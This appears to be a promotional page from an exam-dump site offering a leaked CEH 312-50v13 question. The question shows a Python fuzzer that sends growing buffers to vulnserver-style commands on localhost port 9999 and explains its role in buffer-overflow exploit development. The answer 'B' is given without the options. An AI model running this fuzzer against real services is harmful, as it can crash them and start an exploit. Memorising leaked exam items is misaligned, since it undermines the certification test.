Valid 312-50v13 Dumps shared by EduDump.com for Helping Passing 312-50v13 Exam! EduDump.com now offer the newest 312-50v13 exam dumps, the EduDump.com 312-50v13 exam questions have been updated and answers have been corrected get the newest EduDump.com 312-50v13 dumps with Test Engine here:
#!/usr/bin/python import socket buffer=["A"] counter=50 while len(buffer)<=100: buffer.append("A"*counter) counter=counter+50 commands=["HELP","STATS","RTIME","LTIME","SRUN","TRUN","GMON","GDOG","KSTET"," GTER","HTER","LTER","KSTAN"] for command in commands: for buffstring in buffer: print "Exploiting " + command + ": " + str(len(buffstring)) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1', 9999)) s.recv(50) s.send(command + buffstring) s.close() What is the code written for?
Correct Answer: B
In CEH v13 Module 05: System Hacking, and in lab-based exploitation exercises, this is a classic fuzzer for buffer overflow testing. The script creates increasingly larger strings of "A" (50, 100, 150...). These are passed as arguments to different vulnerable commands on the target service (127.0.0.1:9999). The goal is to trigger a crash, typically when input exceeds buffer limits (i.e., buffer overflow). This is part of exploit development to identify the offset and locate the instruction pointer overwrite (EIP overwrite). Reference: CEH v13 Module 05 - Buffer Overflow Concepts CEH iLabs: Exploitation with Custom Fuzzers in Python EC-Council Exploit Development Lab Manual